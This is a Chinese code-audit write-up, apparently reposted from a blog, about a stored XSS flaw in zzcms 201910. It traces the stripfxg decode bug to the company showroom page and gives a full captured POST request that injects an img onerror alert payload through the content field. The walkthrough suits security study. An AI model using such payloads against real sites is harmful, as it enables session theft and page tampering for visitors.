2. 程式人生 > 實用技巧 >程式碼審計學習—zzcms儲存型xss

程式碼審計學習—zzcms儲存型xss

阿新 發佈:2020-06-27

程式碼審計學習—zzcms儲存型xss

版本:zzcms 201910

本地搭建網站

漏洞位置:

網站/inc/function.php

在stripfxg函式中,存在使用方法htmlspecialchars_decode($string),對htmlspecialchars($string) 過濾(所有傳入引數都進行了過濾)後的引數進行解碼,導致可能存在xss漏洞。

function stripfxg($string,$htmlspecialchars_decode=false,$nl2br=false) {//去反斜槓 
$string=stripslashes($string); 
if ($htmlspecialchars_decode==true){
$string=htmlspecialchars_decode($string); }
if ($nl2br==true){
$string=nl2br($string);
}
return $string; 
}

由stripfxg函式可知,當函式被呼叫,且第二個引數$htmlspecialchars_decode為true時,htmlspecialchars_decode() 方法被呼叫。

查詢stripfxg函式被呼叫的地方:

在 /zt/show.php 找到stripfxg函式被呼叫,且$htmlspecialchars_decode=true

返回值在此頁面列印輸出;show.php頁面是一個展示頁面(註冊後發現是‘公司展廳頁面’,可能觸發xss)

查詢stripfxg 函式第一個引數 $contert 來源

在show.php 包含檔案 top.php 找到了引數 $contert

通過分析程式碼發現 content 是使用者表中的一個欄位

zt/top.php

檢視資料庫發現確實存在 content 欄位

然後考慮如何可以通過修改 zzcms_user 表來控制修改 content欄位

繼續查詢,發現

在admin/usermodify.php 找到 content 欄位修改的sql語句

向上查詢分析修改語句條件

即在使用者進行資訊修改時可控制content 引數

驗證:

註冊

注測公司/個人使用者;公司使用者直接訪問公司展廳頁面觸發xss(個人使用者通過構造id進入展廳頁面 show.php)

修改個人資訊 控制 content引數

抓包,修改content引數:

POST /user/manage.php?action=modify&a=siteconfig.phpHTTP/1.1

Host: www.zzcms.com

Content-Length: 384

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://www.zzcms.com

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://www.zzcms.com/user/manage.php

Accept-Language: zh-CN,zh;q=0.9

Cookie: bdshare_firstime=1591108514281; __51cke__=; PHPSESSID=qeumh4nf9hi81d2mn5gv4lu4aj; UserName=root;

PassWord=63a9f0ea7bb98050796b649e85481845; __tins__713776=%7B%22sid%22%3A%201591687530623%2C%20%22vd%22%3A%209%2C%20%22

expires%22%3A%201591689665881%7D; __51laig__=9

Connection: close

somane=%E7%8E%8B%E4%BC%9F&sex=0&email=111%40qq.com&qq=&oldqq=&mobile=&Submit2=%E4%BF%AE%E6%94%B9&b=0&s=0

&province=%E8%AF%B7%E9%80%89%E6%8B%A9%E7%9C%81%E4%BB%BD&city=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%9F%8E%E5%8C%BA

&xiancheng=&address=&homepage=&phone=18899999999&fox=&content=%26nbsp%3B&img=%2Fimage%2Fnopic.gif&oldimg=%2Fimage%2Fnopic.gif&flv=&oldflv=

&content=<img+src=x+onerror=alert`1`>

訪問展廳頁面:

資料已儲存在資料庫中:

相關推薦

程式碼審計學習zzcms儲存xss

程式碼審計學習zzcms儲存xss 版本:zzcms 201910 本地搭建網站 漏洞位置: 網站/inc/function.php

【專案】 Java 過濾器 解決儲存xss攻擊問題

技術標籤:專案Javaxss攻擊JavafilterrequestinputStream XSS攻擊場景 攻擊者可以通過構造URL注入JavaScript、VBScript、ActiveX、HTML或者Flash的手段,利用跨站指令碼漏洞欺騙使用者,收集Cookie等相關資料並冒

儲存 XSS 原理復現

儲存 XSS 原理復現 漏洞最少會影響 3 個邏輯實體: 受害者瀏覽器 攻擊者伺服器

DedeCMS歷史版本程式碼審計學習

DEDECMS歷史版本程式碼審計學習 學習程式碼審計,自己簡單記錄一下。如有錯誤望師傅斧正。

Catfish(鯰魚) Blog V1.3.15儲存 xss

Catfish(鯰魚) Blog前臺文章評論處存在 儲存xss漏洞。在 application\\index\\controller\\index.php 檔案第 692行

java程式碼審計學習筆記

一、程式碼審計常用思路 1、介面排查(\"正向追蹤\") 2、危險方法溯源(\"逆向追蹤\")

56:程式碼審計-JAVA專案Filter過濾器及XSS挖掘

思維導圖 看構成,看指向,看配置,看程式碼-->尋繞過 web.xml檢視Filter過濾器

php程式碼審計基礎學習(一)

零、參考文章而和書籍 https://www.jianshu.com/p/f69b1f2fcdcf https://zhuanlan.zhihu.com/p/22417081

2021-01-07 儲存跨站指令碼XSS Stored

儲存XSS原理: 攻擊者在頁面插入xss程式碼,服務端將資料存入資料庫,當用戶訪問存在xss漏洞的頁面時,服務端從資料庫取出資料展示到頁面上,導致xss程式碼執行,達到攻擊效果。

淺談三分鐘學習Java泛中T、E、K、V、?的含義

是Java中一個非常重要的內容,對於Java進階學習是必須要掌握的知識點之所以說這個知識點重要,如果你有過閱讀過一些開源框架的程式碼,那你一定會看到原始碼中有很多地方使用到了泛

從別人的程式碼學習golang系列--01

自己最近在思考一個問題,如何讓自己的程式碼質量逐漸提高,於是想到整理這個系列,通過閱讀別人的程式碼,從別人的程式碼學習,來逐漸提高自己的程式碼質量。本篇是這個系列的第一篇,我也不知道自己會寫多少篇,

從別人的程式碼學習golang系列--02

這篇部落格還是整理從https://github.com/LyricTian/gin-admin 這個專案中學習的golang相關知識

electron程式碼審計

解包 Electron跨平臺程式破解https://www.52pojie.cn/thread-563895-1-1.html Electron封裝的跨平臺程式破解的一般思路:

PHP程式碼審計分段講解(9)

22 弱型別整數大小比較繞過 <?php error_reporting(0); $flag = \"flag{test}\"; $temp = $_GET[\'password\'];

PHP程式碼審計分段講解(11)

後面的題目相對於之前的題目難度稍微提升了一些,所以對每道題進行單獨的分析

PHP程式碼審計01

概述 程式碼審計是對應用程式原始碼進行系統性檢查的工作,目的是為了找到並且修復應用程式在開發階段存在的一些漏洞,或者程式邏輯錯誤。

pikachu靶場之DOMxss

DOM,全稱Document Object Model,是一個平臺和語言都中立的介面,可以使程式和指令碼能夠動態訪問和更新文件的內容、結構以及樣式。

PHP程式碼審計分段講解(12)

28題 <!DOCTYPE html> <html> <head> <title>Web 350</title> <style type=\"text/css\">

BUUOJ | [OGeek2019]babyrop(ROP、程式碼審計

題目連結 靜態分析 checksec 檢查,沒有什麼特別的保護機制 IDA 載入,main() 函式內容如下:

PHP程式碼審計分段講解(13)

程式碼審計分段講解之29題,程式碼如下: <?php require(\"config.php\"); $table = $_GET[\'table\']?$_GET[\'table\']:\"test\";